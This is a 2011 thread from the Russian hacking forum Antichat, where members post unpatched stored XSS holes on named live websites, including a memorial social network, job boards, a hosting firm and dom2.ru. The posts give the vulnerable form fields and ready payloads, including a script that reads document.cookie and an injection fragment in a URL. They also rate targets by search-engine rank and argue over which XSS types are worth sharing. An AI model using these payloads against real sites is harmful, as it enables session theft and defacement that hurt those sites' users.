HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #451  
Старый 10.11.2011, 04:12
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ruslan1817  
Ruslan1817 said:
эта пассивка...!
Okay
 
Ответить с цитированием

  #452  
Старый 10.11.2011, 04:22
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Социальная сеть мёртвых.

pomnipro.ru

Уязвимо поле ввода комментариев. (только для залогинённых)

И в своём профиле все поля.

Ничего не фильтруется.

http://pomnipro.ru/memorypage/show/834/

За 2 месяца так и не додумались пофиксить, хотя о баге знают.
 
Ответить с цитированием

  #453  
Старый 10.11.2011, 20:58
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

За Русского и Эстонского пилота. Часть 2 (Coming Soon)

Site: http://www.joblist.tj/

1. Добавляем Вакансию: http://www.joblist.tj/addvacancy.php

2. Утверждаем Вакансию: http://www.joblist.tj/moderation/

3. Profit!


Уязвимые строки:

Код:
Code:
"Название организации"
"Должность"
"Требования к кандидату"
"Условия труда"
"Задачи и обязанности рабочего"
"Телефон"
"Факс"
"Email"
"Web"
Sploit:

Код:
Code:
">alert(/mix0x0/)
Site: http://www.tajtube.tj

Поле: Сайт

Sploit:

Код:
Code:
">alert(/mix0x0/)
 
Ответить с цитированием

  #454  
Старый 11.11.2011, 23:17
Drager
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 32
По умолчанию

Kolibry CMS

Target: Kolibry CMS v.0.3.1

Info: Persistent XSS подвержены поля: “Город”, “Другая информация”, “Подпись”, в разделе “Личные данные”.

Info: Persistent XSS в поле “Тема сообщения”, раздела “Личные сообщения”.

 
Ответить с цитированием

  #455  
Старый 12.11.2011, 23:17
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

dom2.ru

Без комментариев. Все знают, что это

Яндекс тИЦ (CY) 600

Google PageRank (PR) 6


Любого пользователя можно "поздравить", отправив ему в ЛС открытку (даже без авторизации). Создаются открытки и добавляются в общий каталог также без авторизации.

Уязвимо название открытки, которое вводится, после нажатия "сохранить" в редакторе.

Пример:

dom2.ru/community/users/123/send-gift/83730643

123 - ID пользователя, которому отправляется сообщение.

83730643 - ID открытки.
 
Ответить с цитированием

  #456  
Старый 15.11.2011, 11:32
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Finki  
Finki said:
http://www.
sonyericsson.com
/xperianordic/index-modal.php?cc=se&lc=sv&item=%22%3E%3Cscript%3Ealert %28%27lol%27%29%3C/script%3E
Эмм молодой_человек/леди... Вы знаете отличия активных ХСС от пассивных ?? Знаете ? А зачем тогда постите ЭТО ?

З.Ы. Прошу модеров принять адекватные действия.
 
Ответить с цитированием

  #457  
Старый 15.11.2011, 19:36
Дядька
Guest
Сообщений: n/a
Провел на форуме:
13724

Репутация: 0
По умолчанию

spooo.ru

http://spooo.ru/users/registration/

Уязвимы поля "Имя:", "Фамилия:"

">alert(/XSS/)

ТИЦ: 90 Pr: 2
 
Ответить с цитированием

  #458  
Старый 15.11.2011, 19:52
Дядька
Guest
Сообщений: n/a
Провел на форуме:
13724

Репутация: 0
По умолчанию

nvhost.ru - хостинг

http://nvhost.ru/domains.php

Уязвимо поле проверки домена.

">alert(/XSS/)

ТИЦ: 150 Pr: 4
 
Ответить с цитированием

  #459  
Старый 15.11.2011, 21:22
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Finki  
Finki said:
Прошу создать тему с пассивными XSS на популярных сайтов.
Абсолютно не вижу смысла. Большинству народу не нужны пассивки, если они не почтовиках. А тому кому нужны - сам найдёт на нужном домене.
 
Ответить с цитированием

  #460  
Старый 21.11.2011, 01:00
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

SIXSS

Код:
Code:
http://www.playonline.com.ua/game.php?id=1313%29--+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
ой завтыкал... это ж скуля
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ